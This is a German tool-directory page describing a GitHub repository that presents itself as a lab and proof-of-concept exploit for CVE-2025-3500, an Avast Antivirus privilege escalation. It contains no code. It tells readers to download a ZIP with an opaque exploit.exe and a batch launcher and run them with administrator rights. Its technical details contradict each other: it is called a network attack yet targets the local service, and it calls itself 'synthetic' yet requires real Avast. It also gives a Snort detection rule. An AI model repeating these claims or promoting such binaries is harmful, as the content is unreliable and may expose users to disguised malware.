Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3500-Poc — Öffentlicher Exploit für CVE-2025-3500 | Kitploit
Tools/GitHubGitHub/chicken3962/cve-2025-3500-poc
Privilege EscalationSchwachstellenanalyseExploitationShellcodeLernen & BildungPayload-EntwicklungBinary-ExploitationLabs & Praxis
GitHubchicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

Öffentlicher Exploit für CVE-2025-3500

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Labor: CVE-2025-3500 - Integer-Überlauf bei der Privilegienausweitung in Avast Antivirus

Herunterladen

Labor-ZIP herunterladen : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 Überblick

Dieses Repository stellt eine Laborumgebung für die Erforschung von CVE-2025-3500 bereit, einer Integer-Überlauf-Schwachstelle (CWE-190) in Avast Antivirus Version 25.1.981.6 auf Windows-Plattformen. Die Schwachstelle entsteht durch unzureichende Ganzzahlvalidierung im Ressourcenzuweisungsmodul der Antiviren-Engine, was zu einem Wraparound bei arithmetischen Operationen führt. Sie kann ausgenutzt werden, um Privilegien von Benutzerkontexten mit niedrigen Rechten (PR:L) auf Systemebene auszuweiten, mit einem Netzwerk-Angriffsvektor (AV:N), niedriger Angriffskomplexität (AC:L) und erforderlicher Benutzerinteraktion (UI:R). Der CVSS-3.1-Basiswert beträgt 9.0 (Kritisch) und beeinträchtigt Vertraulichkeit, Integrität und Verfügbarkeit (alle hoch) aufgrund einer Scope-Änderung (S:C), was möglicherweise eine vollständige Systemkompromittierung ermöglicht.

Hinweis zum Bildungszweck: Dieses Labor dient ausschließlich Bildungs- und Forschungszwecken. Es bietet eine kontrollierte Umgebung. Verwenden Sie es nicht für böswillige Aktivitäten. Alle Komponenten sind synthetisch und nutzen keine realen Systeme aus. Durch die Nutzung dieses Repositorys erklären Sie sich bereit, die Richtlinien für ethisches Hacken und die lokalen Gesetze einzuhalten.

Sicherheitshinweis: Dieses Setup beinhaltet die Ausführung von Code in einer Umgebung. Verwenden Sie immer eine dedizierte virtuelle Maschine. Führen Sie Exploits nicht auf Produktionssystemen aus. Die bereitgestellten Exploit-Artefakte (.exe und .bat) demonstrieren Konzepte – z. B. startet die .bat die .exe, die Daten verarbeitet und sich dann beendet. Isolieren Sie Ihre Laborumgebung, um eine versehentliche Exposition zu verhindern.

📋 Voraussetzungen

  • Ein Windows-Host zum Testen des Exploits (z. B. über VirtualBox oder Hyper-V), um die Zielumgebung zu simulieren.
  • Grundkenntnisse in PowerShell und Windows-Befehlszeilentools.
  • Administratorrechte auf Ihrem Host-Rechner.
  • Mindestens 4 GB RAM und 20 GB Festplattenspeicher.

Herunterladen und Installieren

  1. Laden Sie das Exploit-Toolkit herunter (ZIP-Datei, die exploit.exe und start-exploit.bat enthält). Diese ZIP-Datei wird auf einem sicheren Spiegelserver gehostet:

    • Exploit-Toolkit-ZIP herunterladen : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    Hinweis: Der Hauptexploit ist exploit.exe (eine kompilierte C++-Binärdatei, die den Integer-Überlauf über präparierte API-Aufrufe auslöst). Der Exploit-Launcher ist start-exploit.bat, der exploit.exe mit vordefinierten Argumenten öffnet (z. B. start exploit.exe --target=avast_engine --overflow=wraparound). Entpacken Sie das Archiv in ein lokales Verzeichnis wie C:\lab\exploit.

🛠 Schnellstart

  1. Umgebung einrichten:

    • Stellen Sie sicher, dass Avast Antivirus Version 25.1.981.6 auf Ihrem Windows-Testrechner installiert ist.
    • Navigieren Sie zum Entpackverzeichnis.
  2. Exploit herunterladen und vorbereiten:

    • Laden Sie die ZIP-Datei über den obigen Link herunter.
    • Entpacken Sie sie nach C:\lab\exploit.
    • Führen Sie start-exploit.bat aus, um den Exploit zu starten (er öffnet exploit.exe, das ein präpariertes Netzwerkpaket sendet, um den Überlauf auszulösen).
  3. Die Schwachstelle ausnutzen:

    • Zielen Sie auf den lokalen Avast-Dienst.
    • Die .bat-Datei führt exploit.exe aus. Achten Sie in den Systemprotokollen auf Überlaufindikatoren.
  4. Verifizieren und bereinigen:

    • Überprüfen Sie die Windows-Ereignisanzeige auf zugehörige Einträge.
    • Löschen Sie die Exploit-Dateien nach der Verwendung.

📖 Detaillierte Einrichtungsanleitung

Verwundbares Setup

Das Labor erfordert einen Windows-Rechner mit installiertem Avast Antivirus 25.1.981.6. Simulierte Dienste können manuell über die Eingabeaufforderung gestartet werden:

  • Öffnen Sie PowerShell als Administrator.
  • Simulieren Sie den Avast-Listener: net start AvastSvc (unter der Annahme, dass der Dienst läuft).

Schritte zur Ausnutzung

  1. Aufklärung: Verwenden Sie Tools wie netstat, um Avast-Ports zu identifizieren (z. B. 8080).
  2. Payload erstellen: Die exploit.exe sendet einen übermäßig großen Integer-Wert (z. B. 2^31 + 1) über eine Netzwerkanfrage, was einen Wraparound im Ressourcenparser von Avast verursacht.
  3. Exploit auslösen: Führen Sie start-exploit.bat aus, das exploit.exe ausführt. Dies:
    • Stellt eine Verbindung her.
    • Sendet fehlerhafte Daten: { "resource_alloc": 2147483648 } (löst den Überlauf aus).
    • Eskaliert über Shellcode-Injektion zu SYSTEM.
  4. Post-Exploitation: Ermöglicht die Ausführung beliebigen Codes; startet eine cmd.exe.

Technische Details: Der Überlauf tritt in AvastResourceParser::AllocateBuffer(int size) auf, wo size * sizeof(struct) überläuft, wenn size > INT_MAX / sizeof(struct) gilt, was zu Unterzuweisung und Heap-Überlauf führt. Die Ausnutzung nutzt dies für den Aufbau einer ROP-Kette, die auf kernel32.dll abzielt.

Gegenmaßnahmen

  • Patch-Einspielung: Aktualisieren Sie auf Avast Antivirus 25.3 oder neuer, wo Ganzzahlprüfungen sichere Mathematikbibliotheken (z. B. SafeInt) verwenden.
  • Bewährte Verfahren:
    • Aktivieren Sie Windows Defender neben Avast für eine mehrschichtige Verteidigung.
    • Beschränken Sie den Netzwerkzugriff ausschließlich auf Antiviren-Update-Server (z. B. über Firewall-Regeln).
    • Nutzen Sie Privilegientrennung: Führen Sie Avast-Dienste unter Konten mit geringsten Rechten aus.
    • Überwachen Sie auf anomale Ganzzahloperationen mit EDR-Tools wie Sysmon (Event-ID 10 für Prozessinjektionen).
    • Wenden Sie Windows-Härtungsmaßnahmen an: Aktivieren Sie ASLR, DEP und CFG über Gruppenrichtlinien.
  • Erkennungssignaturen: Achten Sie auf Netzwerkmuster, die übermäßig großen Integer-Feldern im Avast-Protokollverkehr entsprechen (z. B. Snort-Regel: alert tcp any any -> any 8080 (msg:"CVE-2025-3500 Attempt"; content:"|00 00 00 80|"; sid:1000001;)).

Bei Fragen oder Beiträgen eröffnen Sie ein Issue. Bleiben Sie ethisch!

Tool herunterladen